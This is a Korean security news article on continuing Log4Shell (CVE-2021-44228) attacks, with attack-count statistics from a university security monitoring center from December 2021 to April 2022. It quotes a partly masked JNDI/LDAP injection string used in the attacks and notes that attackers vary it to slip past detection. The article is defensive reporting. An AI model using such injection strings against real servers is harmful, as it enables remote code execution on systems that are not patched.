로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형!

Log4j 취약점 공격, 지난해 12월부터 지금까지 지속 포착
공격형태 다양하고, 보안장비 우회 가능성 있어 위험도 높아

[보안뉴스 기획취재팀] 지난해 발견돼 역대 최악의 취약점으로 불리는 Log4j 취약점, 일명 로그4셸을 악용한 사이버공격이 지속적으로 포착돼 이용자들의 각별한 주의가 필요하다. Log4j는 JAVA를 기반으로 서버와 응용프로그램에서 발생하는 로그를 남기기 위해 사용하는 유틸리티이다. 해당 취약점은 apache Log4j 소프트웨어의 2.14.1 이전버전에 존재하며, 식별 번호는 CVE-2021-44228이다.

▲2021년 12월~2022년 4월 로그4j 취약점 공격 건수 통계[자료=영남이공대 사이버보안연구센터]

영남이공대학교 사이버보안연구센터(센터장 이종락)에서 자체 운영중인 보안관제센터를 통해 최근까지 수집한 데이터를 살펴보면, 취약점이 발생한 지난해 12월을 기점으로 log4j 취약점 공격이 지속적으로 탐지되다가 12월 25일 공격 횟수가 250회까지 치솟았다. 이후 공격횟수는 점차 줄었으나, 올해 2월 8일 200여건으로 다시 급증했다. 또한, 3월 4일 이후 150건으로 급격히 늘었다.

공격에 주로 사용되는 코드는 ‘${jndi:ldap://server_ip:****/exploit}’이며, 공격코드가 최초 발표됐던 형태에서 보안장비 우회를 위해 다양하게 변화된 것으로 확인됐다.

log4j 취약점은 공격에 성공할 경우 피해 서버에서 공격자가 의도하는 명령어가 직접적으로 실행될 수 있어 매우 위험하다. 이는 취약점 위험도 평가인 CVSS score에서 최고점인 10점이 부여된 사실로도 알 수 있다.

영남이공대학교 사이버보안연구센터 유현서 연구원은 “공격의 형태가 매우 다양하기 때문에 탐지 룰의 구성에 따라 보안장비에서 우회 가능성이 존재한다”며 “공격 코드가 보안 장비에서 제대로 탐지되고 있는지 점검해야 한다”고 밝혔다.
[보안뉴스 기획취재팀(boan3@boannews.com)]

내년 회사에 꼭 도입하고 싶은 보안 솔루션 또는 플랫폼은 무엇인가요?
	XDR
	EDR
	AI 보안
	제로트러스트
	공급망 보안 체계(SBOM)
	클라우드 보안 솔루션
	기타(댓글로)